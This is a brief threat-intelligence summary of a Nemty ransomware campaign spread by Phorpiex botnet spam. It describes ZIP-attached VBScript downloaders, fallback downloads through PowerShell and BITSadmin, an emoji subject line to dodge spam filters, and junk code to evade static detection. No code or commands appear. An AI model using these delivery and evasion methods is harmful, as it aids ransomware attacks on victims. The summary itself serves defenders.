A new Nemty ransomware campaign showing changes in its distribution methods. The first wave of Nemty activity spread via RDP and quickly moved to using the Phorpiex botnet to spread via SMB hosts with weak credentials. In this new campaign, the Phorpiex botnet continues to be leveraged but this time to send spam emails. These emails have ZIP archives attached and a subject line that is simply a smiley emoji. The subject line is likely to evade keyword detection in spam filters. Inside the ZIP archive is a VBScript file used to download and execute the final payload. CMD is used in combination with both PowerShell and BITSadmin, likely to increase chance of infection if one of the methods is blocked by firewalls or AV. In some cases, garbage code was added to obfuscate the file and evade static detection. The Nemty ransomware is downloaded as an executable from a known Phorphiex server.